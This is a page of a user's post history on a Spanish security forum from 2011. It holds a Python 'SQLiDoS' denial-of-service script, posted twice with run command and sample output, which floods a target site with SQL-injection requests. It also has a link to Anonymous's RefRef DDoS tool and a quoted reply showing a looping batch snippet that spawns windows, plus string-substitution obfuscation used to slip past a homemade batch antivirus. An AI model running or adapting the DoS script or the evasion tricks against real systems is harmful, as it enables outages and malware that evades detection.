últimos mensajes de: VanX

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 27

81	Seguridad Informática / Seguridad / Re: Acceso a mi cuenta facebook, para robarme fichas de poker	en: 13 Agosto 2011, 17:31 pm
Cita de: Lavacaloca en 13 Agosto 2011, 17:24 pm Tal vez los que hicieron la aplicación hizieron un BUG apropósito , y asi podrian sacar el dinero de las cuentas que tengan mucho dinero sin que nadie lo pueda evitar.... No creo, porque seria un delito y no hace falta que se arriesguen a ganar un dinero extra con todo lo que ganan, ademas de que he consultado y es bastante famoso Ahora estoy mirando si tiene vulnerabilidades

82	Seguridad Informática / Desafíos - Wargames / Re: Web recopilatoria de stats de diferentes Wargames	en: 12 Agosto 2011, 22:47 pm
gracias por la web

83	Seguridad Informática / Seguridad / Re: Acceso a mi cuenta facebook, para robarme fichas de poker	en: 12 Agosto 2011, 22:42 pm
Puedes postear la url de la aplicación, voy a mirar si tiene bugs

84	Foros Generales / Foro Libre / Demostracion de la arma DDOS refref de anonymous	en: 9 Agosto 2011, 13:38 pm
fuente: es.refref.org

85	Programación / Scripting / Re: No me funciona este programa de python	en: 9 Agosto 2011, 13:37 pm
solucionado

86	Programación / Scripting / Re: No me funciona este programa de python	en: 8 Agosto 2011, 16:44 pm
Uso ubuntu y uso la terminal de este, no entiendo

Programación / Scripting / No me funciona este programa de python

en: 8 Agosto 2011, 16:22 pm

Hola a todos, buscando encontre este code pero no funciona....

Cuando lo ejecuto no pasa nada en el terminal sale asi:

>

y no hace mas.... espero que me puedan ayudar

Código

#!/usr/bin/python
# SQLiDoS - SQL Denial of Service
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>"
    sys.exit(1)
 
def attack():
	connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connection.connect((sys.argv[1], 80))
	print "[+] GET /" + sys.argv[2] + " HTTP/1.1"
	connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	connection.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	connection.close()
 
Host = sys.argv[1]
SQLi = sys.argv[2]
CoNum = int(sys.argv[3])
print "[+] Connecting to %s" % (Host)
print "[+] Injecting %s" % (SQLi)
for i in range(1, CoNum+1):
	attack()

Como ejecutarlo:

Código

SQLiDoS.py www.sitioweb.com index.php?id=' 10

Funciona:

Código

[+] Connecting to www.sitioweb.com
[+] Injecting index.php?id='
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1

Les agradezco la ayuda de antemano!

saludos

Programación / Desarrollo Web / Python a javascript?¿

en: 8 Agosto 2011, 16:20 pm

Hola a todos, estuve buscando y buscando muchoooo por internet y no encontre nada sobre esto. Tengo un codigo en pythoon que me gustaría realizar en javascript pero no se por donde empezar:

Código

#!/usr/bin/python
# SQLiDoS - SQL Denial of Service
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>"
    sys.exit(1)
 
def attack():
	connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connection.connect((sys.argv[1], 80))
	print "[+] GET /" + sys.argv[2] + " HTTP/1.1"
	connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	connection.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	connection.close()
 
Host = sys.argv[1]
SQLi = sys.argv[2]
CoNum = int(sys.argv[3])
print "[+] Connecting to %s" % (Host)
print "[+] Injecting %s" % (SQLi)
for i in range(1, CoNum+1):
	attack()

Como ejecutarlo:

Código

SQLiDoS.py www.sitioweb.com index.php?id=' 10

Funciona:

Código

[+] Connecting to www.sitioweb.com
[+] Injecting index.php?id='
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1

Les agradezco la ayuda de antemano!

saludos

89	Seguridad Informática / Seguridad / Re: [B]atch [D]efender v3.2 - Antivirus para ".bat" (by VanX)	en: 1 Agosto 2011, 12:58 pm
Gracias me lo voy a mirar! saludos

90	Seguridad Informática / Seguridad / Re: [B]atch [D]efender v3.2 - Antivirus para ".bat" (by VanX)	en: 1 Agosto 2011, 08:53 am
Cita de: jmetin2 en 1 Agosto 2011, 04:59 am pues la verdad no detecta codigos ofuscados Mira ase tiempo cree un ofuscador de texto en batch tipo visual basic pero me cree un archivo .bat (virus basico) @echo off title Hola :hola start goto hola exit y lo pase por mi encriptador batch y quedo asi @ccmd34GGJ3 j3J4OO&JJ3K20JdkIJ rgij9IJHOIHklnN&:OIJq90399U&SjeakFPIihaIHip0a&'9JE'JA'9J OIJq90399U&MMDNU204 y stub lo que ase es leerse asi mismo y busca una cadena de numeros y de ay parte la cadena para desencriptarla. Paso tu antivirus y no detecta nada, Ejecuto y me salen las miles de pantallas y nada de nada Creo que Debes mejorar tu codigo en tiempo Real jeje. Porsierto Debes de agregarle un poco de IA a tu antibatch, si ay una etiqueta y no ay mas de 5 lineas dentro de la etiqueta y el ultimo comando es un goto Debes chekar cada codigo como Si en esos comandos ay una "If" y un goto con otra etiqueta, es un codigo libre. Digo lo anterior de la IA porque con un codigo nada malware: @echo off title Hola echo.>hola.exe Del hola.exe exit Pues este codigo no ase nada lo mas que ase es crearte un archivo y de nuevo borrarlo. Si quieres te ayudo a tu proyecto. Claro solo es una opcion esta bueno aaaa te preguntaras porque uando ejecute el primer codigo no detecto que se cree el archivo, bueno aqui est la razon: set a=mofgfhh set a="%a:mo=ty%" set a="%a:gf=p%" set a="%a:yp=ype%" %a% "%~0">nul ....... descifra....... set b=TextoDesEnCriptado set a=ffhnmmkkjd set a=%a:ff=S% set a=%a:hn=T% set a=%a:mm=A% set a=%a:STA=start% set a=%a:~0,5% %a% Cmd /C %b%>nul exit Creo que tu codigo solo detecta las variables de este tipo: set a=st set b=a set c=rt set d=%a%%b%%c% %d% >>start y pues deberias chekar y agregarle un chekador MD5 a los archivos que ejecuta el cmd y añadirle a tu antivirus una lista de md5 de los virus pobles a ejecutar. Yo con mucho gusto te ayudaria y la verdad es facil. Edito Para Agregate Otras Cositas: con los comandos copy Debes ser un poco mas sensible y como te dije ase rato la IA como otro ejemplo: Copy %~0 %homepath%\Escritorio\Yo.bat Bueno si se copia asi no creo que haga mucho daño tu lo que Debes escanear de este codigo son las rutas donde se copia, no es lo mismo homepath a Windir Otra cosa los parametros de copy por ejemplo que sobre escriba. Como te dije con la lista MD5 y el tiempo real modifica el registro para que pase por tu programa todo el codigo. no directamente por la shell de comandos como la Famosa SandBox de los muchos antivirus. Es algo bastante bueno y hablando de sandbox la podrias agregar 1 Ejecutar con todos los derechos: poder manejar todos y cada uno de los archivos del sistema con total confianza 2 Derechos Limitados: poder manejar archivos sin importancia 3 Sin ningun derecho a ejecutar comando que no esten en el system32 ni comandos que afecten los archivos y bueno esa es mi idea y vendria enlazada con la IA. Espero que te sirva. Sabía que no detectaba ofuscados y por eso estoy trabajando en ello y también en detectar solo los codigos malvados porque a veces detecta secuencias como la que has mencionado gracias

Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 27